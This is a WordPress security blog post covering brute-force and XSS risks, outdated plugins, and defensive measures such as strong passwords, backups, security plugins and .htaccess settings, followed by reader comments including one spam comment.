WordPress is known as the best blogging platform for a reason. I am sure everyone knows it as an amazing CMS platform which enfolds a multiple number of features and functions on it. One excellent thing with WordPress is it has got a plenty of plugins and resources which helps in enhancing the functionality of any website.
The recent attack on WordPress blogs by unidentified hackers has brought the vulnerability of WordPress to attention. Categorized as ‘brute force’ attacks, they made the news and warned WordPress site owners – once again – that it is in their best interests follow safety best practices.
The Evolution of WordPress
It has taken WordPress 10 years to become the most popular web content management system in the world. It is estimated that 22% of new sites and approximately 60 million sites in all, are powered by WordPress. CNN, eBay, Forbes and Sony are just some of the leading brands that maintain WordPress sites. The CMS generates over 4 billion page views and close to 40 million posts each month. According to website monitoring service Pingdom, WordPress is the blogging system of choice for the world’s top 100 blogs.
These numbers will definitely give you an idea about the massive impact of WordPress on businesses and individuals using the cyberspace.
Even as WordPress has evolved, sites and blogs powered by this system have become the favorite targets of hackers. The bottom line is, WordPress security must be taken seriously. If you are not aware of the security risks and the mitigators/controls you can use to bring risks to acceptable levels, read on.
To understand how you can safeguard your WordPress site against malicious intents, you first need to know about the vulnerabilities in the system. An idea about the possible ways in which your WordPress site/blog can be attacked, can prepare you for counter-measures at your end. These are the most common attacks on WordPress powered sites:
If your site has been the victim of a brute force attack, then right off the bat, it can be assumed that your username and password credentials are not up to the mark. Basically, this type of attack involves trying to guess your username and password. So, if you still have the default ‘admin’ username or a weak password, you are extending an open invitation for attacks. Keep in mind that brute force attacks don’t stop after one failed attempt; attackers keep at it and manage to get the better of you. The persistent attempts at infiltrating your site can cause performance issues as they take a huge toll on your server memory.
How do you prevent it? The basic precautionary measure you can take includes not continuing to use the ‘admin’ username. Create a unique and hard-to-guess user with Administrator rights. If your name is Jennifer or Tim – which you display publicly on your blog – don’t use the same as your username. That would make it too easy for anyone to guess. It cannot be emphasized just how important it is that you set a strong password. A good one will have lower and upper case letters, characters and numbers. An example for a complex password is B5l(78)O12g9
or IlOve&28BlOg
. Here are some don’ts of creating a password:
You can also consider installing a login limiter for WordPress. This basically quarantines or blocks a username/IP address that is trying and failing to complete login requests above a specific threshold rate. For instance, a penalty time-out of one hour can be imposed on a limit of 10 attempted logins every 5 minutes. Such limits will discourage and frustrate hackers as they won’t be able to try enough variations to gain illegal access.
Abbreviated as XSS, cross-site scripting allows attackers to inject client-side scripts into webpages being viewed by other users. Attackers may take advantage of this vulnerability to circumvent access controls.
In script injection, attackers look for one of your site’s input elements – such as the name, search or contact field – and inject malicious JavaScript or PHP commands. There are many ways in which such an attack can compromise your WordPress site. Attackers may make their way into your database, insert data and make it visible to your visitors. They may steal sensitive customer or financial information, impersonate users by accessing and hijacking session information (communication between site and users), and even bring down your entire site.
How can you prevent it? There are different measures you can take to combat cross-site injection. File validation, data validation and output sanitization are some techniques. As these involve some technical background, it is best to look them up and understand them in their entirety, for successful application.
It is not uncommon to hear about attacks on older WordPress versions. If you are using a version of WordPress after 2.8.3, you’re on the safe side; it is however advised that you upgrade to the latest version (3.5.1), which includes a number of fixes that can keep your site safe. Out-of-date plugins are extremely vulnerable to attacks – if you have been holding back on updating to newer versions, it’s time to do the right thing.
A good way to prevent hacking is to use quality plug-ins with good ratings, many downloads and active author support. Reliable authors will address security issues and accordingly update their plug-ins.
WordPress site/blog owners can take a number of precautionary steps to strengthen security. Here are some you can invest in.
A basic technology update to keep hackers away from identifying system loopholes is essential. There are many areas where hackers can spot loopholes and plan attacks. A comprehensive technology update will include malware checks, laptop password updates and anti-virus updates. Also make sure that your operating system, ISP and router have adequate firewalls.
It is important that you back-up your entire database using a plug-in or even manually. You can choose from some excellent plugins that perform automatic full-site backups, such as BackUpBuddy (available on a yearly subscription and the easiest option for restoring a WordPress site), VaultPress (monthly subscription) and WordPress Backup to Dropbox (free and premium).
As mentioned earlier, don’t hesitate to update plug-ins or your WordPress site, fearing that it would break your website. Some best practices in this regard include (a) ensuring that back-ups are up-to-date, by scheduling them on a daily or weekly basis (b) updating WordPress, plugins or themes at the earliest – pay attention even to minor updates as they will contain critical security fixes and (c) for major WordPress, theme or plugin updates, wait for a while until developers have conducted live testing on the updates. If you have another WordPress install, you can try duplicating your website and updating it first to determine if it’s fine to do the same with your live site.
Note: You can follow news about the latest fixes/patches on WordPress Development.
It is best to invest in a good hosting service. A provider well-versed with WordPress will be able to handle permissions and installation more capably, and the variation in service will be apparent to you. Partnering with a reliable service that knows WordPress can do its bit for site/blog security. Here are some options:
Bluehost: A popular choice, Bluehost offers shared and upgraded shared hosting with added resources and fewer users on one server.
Dreamhost: It detects hacks proactively
WP Engine: This is a good bet if you want top-of-the-line WordPress security. From regular security scans to daily back-ups, it helps you address security issues easily and conveniently.
There are quite a few free and paid security plugins that can monitor and protect your WordPress site. A free security plugin – Wordfence – offers multiple monitoring levels and is also available as a premium plan. Bulletproof Security (limited monitoring), Sucuri (malware clean-up), WordPress Firewall 2 and VaultPress are other options you can explore. The WP Security Scan is also a good security solution; this plug-in scans your blog for vulnerabilities and reports malicious codes to you.
New WordPress sites are more prone to attacks as there is a much less likelihood that they will have all the key security fixes. Hackers have been seen to capitalize on this. You can avoid presenting your WordPress site as a newbie by removing the text link ‘Powered by WordPress’ in the footer, removing default posts on the Homepage and adding as many posts as possible to your site, to make it appear as if it’s been in existence for a while.
As discussed earlier, it is important that you change the default admin log-in and have a strong password. There is a good choice in tools to check password strength. Some you can explore are Password Meter (AskTheGeek), Password-Review (LBW-SOFT) and Password Checker (Microsoft).
As a cautionary measure, you can keep your visitors from browsing your entire directory. Hackers can study directory structures to identify security holes. To disable directory browsing, you can add the following to the .htaccess in your WordPress blog’s directory:
# disable directory browsing Options All – Indexes
Note: .htaccess is a file used by Apache to define your website’s access rules
Make sure that admin files are adequately protected; only you and a limited number of bloggers should have access to them. .htaccess is one way to restrict access. Depending on whether yours is a static IP address or multi-user blog, you can restrict access only from a defined number of IPs. For more information on how to go about the same and step-by-step instructions, you can look up Apache’s documentation.
As a responsible WordPress site/blog owner, the onus is on you to address security proactively. There are multiple ways to do this. Download new WordPress software updates through CMS backend. When you do this, also verify the compatibility of the new release with your web server’s MySQL and PHP versions. If you notice any violations or bugs you can report the same to the WordPress community. You can submit information at security@wordpress.org. Encouraging users to report security issues is a good way for the WordPress community to be aware of the latest threats and effective measures at their disposal.
Spammers are just as troublesome as hackers; WordPress site owners will vouch for this. Thankfully, there are different ways in which you can combat spam. Here are a few:
There is no predicting when your WordPress site may be the target of malicious elements. If – despite your best efforts – your site is compromised, don’t panic. Inform your host about it, let your fans and readers know about (through Twitter or Facebook), implement the necessary fixes, change your passwords and importantly, make a note of what you should have done to prevent the attack. This will help you enhance site security for the future. Also, remember that it’s not the end of the world – you can have your hacked WordPress site up and running pretty quickly, depending on the type and extent of attack.
So basically what you’re saying is that the solution to wordpress being insecure is 1) use a decent password and 2) use a variety of plugins (word mentioned 9 times in the article) which themselves can introduce a pile of vulnerabilities themselves?
LOL, it takes a multitude of these amazing plugins to allow it to be called a CMS. Otherwise it is just as you first stated and nothing more than a great blog tool. However there is an extension for Joomla called EasyBlog that puts ANYTHING that is inside WordPress to shame!!!
I completely disagree with you there Kevin, WordPress is a compliant CMS with just a few lines of code since version 3 you can easily add Custom Post Types to use WordPress as a powerfull CMS, few plugins for front end posting like gravity Forms and your away.
Not to mention, Joomla has a terrible backend interface. It is also nowhere near as easy to update the software as WP.
great post — security is so important!
Hey Jessica! Great post, helpful for WordPress bloggers and developer as well. Even every wordpress blogger wants to secure their content form attackers.
-Mike
Jessica,
Great post by the way!
If all fails, there’s a free web monitoring service that you can use to monitor your WordPress website to make sure that it’s not defaced by hackers. It’s called Content Site Monitor (contentsitemonitor.com). It allows you to specify certain content/keywords that you want to monitor and it will send you alert email if the content/keywords are missing from your site.
That way, just in case all the measures you put in place fail, you still have a final defense to revive your WordPress website before your readers find out about it.
Wow! beautiful…….hope hackers will not tamper with this new development?
Very interesting. Thanks for sharing this post!!
Some good info there,but as you say you will alway stand a chance of having your site attacked….but its good to be prepaired,thank you for sharing
G’Day! Instantshift,
Thanks for your thoughts, I run a very small website using freehostia.com free hosting services. Website is completely down! Tried to visit freehostia.com to look for troubleshooting answers, it wasnt coming up either for about 20 mins, now back up again. Anybody else with the same problem? my website comes up completely blank no error messages at all. Its connected to wordpress and I cant even log into wp-admin or login page or anything. If server was down would it prevent me from accessing my wordpress login page also? Any help would much be appreciated. Thankyou!
I’ll be back to read more next time
Dear admin ; All steps i follow from today :) thanks for sharing your super knowledge about WordPress Security.
This article is very important for me. I am very happy to read this Article thanks a lot for sharing. thanks
Do you seriously want to take your Visalus home business to a new level. Most of them are full of sugar and processed flour. It helps increase immunity to aid in fighting colds.
It’s actually a nice and helpful piece of information. I am satisfied that you just shared this useful information with us.Please keep us informed like this. Thanks for sharing